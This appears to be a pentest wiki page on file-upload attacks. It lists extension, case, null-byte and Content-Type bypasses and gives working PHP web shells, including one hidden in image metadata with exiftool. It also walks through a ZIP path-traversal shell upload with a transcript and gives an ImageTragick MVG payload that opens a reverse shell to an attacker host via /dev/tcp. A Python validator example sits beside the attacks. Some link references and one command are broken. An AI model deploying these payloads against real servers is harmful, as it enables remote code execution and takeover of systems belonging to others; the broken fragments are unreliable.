File Upload General Methodology

  1. Try to upload a file with a double extension (ex: file.png.php or file.png.php5).

    • PHP extensions: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtml, .pgif, .shtml, .htaccess, .phar, .inc

    • ASP extensions: .asp, .aspx, .config

  2. Try to uppercase some letter(s) of the extension. Like: .pHp, .pHP5, .PhAr ...

  3. Try to add some special characters at the end of the extension: %00, %20, one or several trailing dots...

  4. Set the value of the Content-Type header to image/png or text/plain (many upload handlers trust the client-supplied MIME type instead of inspecting the file).

  5. Put the magic bytes of a real image at the beginning of the file (this fools the file command and similar content sniffing), or put the shell inside the image metadata: exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg. The __halt_compiler(); call stops the PHP parser right there, so the binary image data that follows the comment cannot cause a parse error when the file is executed or included as PHP.

  6. Upload the backdoor with an allowed extension (png) and hope for a misconfiguration that executes it (for example a handler that runs every file in the upload directory through PHP).

  7. Null Byte: file.php%00.png

  8. Find a vulnerability to rename the file

  9. Find a Local File Inclusion vulnerability to execute the backdoor
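The bypasses from steps 1 to 4 and 7 run against a typical weak validator, next to an allow-list validator that none of them get past, as an added Python example (this is not code from the page). EXEC_EXT is built from the PHP/ASP extension lists above; ALLOWED_EXT, IMAGE_MIME and the function names are assumptions made for this illustration.

```python
import os
import re
import secrets

# Deny-list built from the PHP / ASP extension lists above. It is used in
# addition to the allow-list, never instead of it.
EXEC_EXT = {
    "php", "php2", "php3", "php4", "php5", "php6", "php7", "phps", "pht",
    "phtml", "pgif", "shtml", "htaccess", "phar", "inc",
    "asp", "aspx", "config",
}
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}          # assumed allow-list
IMAGE_MIME = {"image/png", "image/jpeg", "image/gif"}


def candidate_names(base="shell", payload_ext="php", allowed_ext="png"):
    """Bypass filenames from steps 1-3 and 7 for one payload extension."""
    return [
        f"{base}.{allowed_ext}.{payload_ext}",      # double extension, payload last
        f"{base}.{payload_ext}.{allowed_ext}",      # double extension, payload first
        f"{base}.{payload_ext.upper()}",            # case variation .PHP
        f"{base}.{payload_ext.capitalize()}",       # case variation .Php
        f"{base}.{payload_ext}%00.{allowed_ext}",   # null byte, still URL-encoded
        f"{base}.{payload_ext}\x00.{allowed_ext}",  # null byte, after decoding
        f"{base}.{payload_ext}%20",                 # trailing space, encoded
        f"{base}.{payload_ext} ",                   # trailing space, decoded
        f"{base}.{payload_ext}.",                   # trailing dot(s)
        f"{base}.{payload_ext}...",
    ]


def weak_check(filename, content_type):
    """Typical broken validator: trusts the client-supplied Content-Type and
    only looks for an allowed extension *somewhere* in the name."""
    if content_type in IMAGE_MIME:
        return True
    return re.search(r"\.(png|jpe?g|gif)", filename, re.IGNORECASE) is not None


def strict_check(filename):
    """Allow-list validator that rejects every name candidate_names() produces:
    ignores Content-Type, strips any directory part, rejects NUL / %00,
    rejects trailing dots or spaces (some servers and filesystems trim them),
    requires every dotted component after the first to be non-executable and
    the LAST component to be on the allow-list."""
    name = os.path.basename(filename.replace("\\", "/"))
    if not name or "\x00" in name or "%00" in name:
        return False
    if name != name.rstrip(" ."):
        return False
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False                      # no extension, or a dotfile like .htaccess
    if any(p in EXEC_EXT for p in parts[1:]):
        return False                      # shell.php.png, shell.png.php, x.phar.jpg
    return parts[-1] in ALLOWED_EXT


def storage_name(filename):
    """Name to store an accepted upload under: random token plus the validated
    extension, so the uploader never controls the basename on disk."""
    if not strict_check(filename):
        raise ValueError("rejected upload: " + repr(filename))
    ext = filename.rsplit(".", 1)[1].lower()
    return secrets.token_hex(16) + "." + ext
```

The null-byte case shows why the NUL check is explicit: after URL-decoding, "shell.php\x00.png" splits into a component "php\x00" that is not in the deny-list, so a validator relying on the deny-list alone would accept it and a C-based layer underneath would see "shell.php".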

If you are trying to upload files to a PHP server, take a look at the .htaccess trick to execute code. If you are trying to upload files to an ASP server, take a look at the .config trick to execute code.

.phar files are to PHP what .jar files are to Java: a PHP archive that can be used like a regular PHP file (executed with php, or included from another script...).

The .inc extension is sometimes used for PHP files that are only meant to be included by other scripts, so at some point someone may have allowed this extension to be executed.

Check a lot of possible file upload vulnerabilities automatically with the Burp Suite upload-scanner plugin.

From File upload to other vulns

Zip File Automatically decompressed Upload

If you can upload a ZIP that is going to be decompressed inside the server, you can do 2 things:

Upload a zip containing symlinks to other files; when the decompressed entries are read back through the web server you get the contents of the linked files (here the application's index.php):

ln -s ../../../index.php symindex.txt
zip --symlinks symlinks.zip symindex.txt

Decompress in different folders

The decompressed files will be created in unexpected folders.

The following content was copied from:

One could easily assume that this setup protects from OS-level command execution via malicious file uploads but unfortunately this is not true. Since ZIP archive format supports hierarchical compression and we can also reference higher level directories we can escape from the safe upload directory by abusing the decompression feature of the target application.

An automated exploit to create this kind of file can be found here:

python -o unix -d 5 -p /var/www/html/ rev.php

To achieve remote command execution I took the following steps:

1. Create a PHP shell:

<?php $cmd = ($_REQUEST['cmd']); system($cmd); ?>

2. Use “file spraying” and create a compressed zip file:

root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# ls *.php
simple-backdoor.php xxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php
xxAcmd.php xxAxxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php
xxAxxAcmd.php xxAxxAxxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAxxAxxAcmd.php
root@s2crew:/tmp# zip xx*.php
adding: xxAcmd.php (deflated 40%)
adding: xxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)

3. Use a hex editor or vi and change the "xxA" to "../". I used vi:

:set modifiable
:%s/xxA/..\//g
:wq!


Only one step remained: upload the ZIP file and let the application decompress it! If it succeeds and the web server has sufficient privileges to write the directories, there will be a simple OS command execution shell on the system:



ImageTragick (ImageMagick < 7.0.1-1)

Upload this content with an image extension to exploit ImageMagick versions before 7.0.1-1 (CVE-2016-3714, "ImageTragick"): the URL inside the MVG fill url() directive reaches a delegate command line without proper escaping, so the shell command between the | characters runs on the server.

push graphic-context
viewbox 0 0 640 480
fill 'url("|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context

Polyglot Files

Polyglots, in a security context, are files that are a valid form of multiple different file types. For example, a GIFAR is both a GIF and a JAR (Java archive) file. There are also files out there that can be both GIF and JS, both PPT and JS, etc.

Polyglot files are often used to bypass protection based on file types. Many applications that allow users to upload files only allow uploads of certain types, such as JPEG, GIF, DOC, so as to prevent users from uploading potentially dangerous files like JS files, PHP files or Phar files.

This helps to upload a file that complies with several different formats at once. For example, it allows you to upload a PHAR file (PHP ARchive) that also looks like a JPEG, but you will probably still need a valid extension, and if the upload function does not allow it this will not help you.

